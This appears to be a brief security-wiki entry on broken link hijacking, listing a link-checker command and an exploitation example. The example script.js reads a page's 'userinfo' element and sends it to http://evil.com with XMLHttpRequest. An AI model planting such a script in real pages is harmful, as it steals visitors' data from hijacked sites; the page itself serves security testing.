Broken Links Hijacking
Tools
# https://github.com/stevenvachon/broken-link-checker
blc -rfoi --exclude linkedin.com --exclude youtube.com --filter-level 3 https://example.com/
Broken Link Hijacking
Investigation
<script src="//example.com/script.js"></script>Exploitation Examples
// script.js
var secret = document.getElementById('userinfo');
var request = new XMLHttpRequest();
request.open('GET', 'http://evil.com/?data=' + secret, false);
request.send();References
Last updated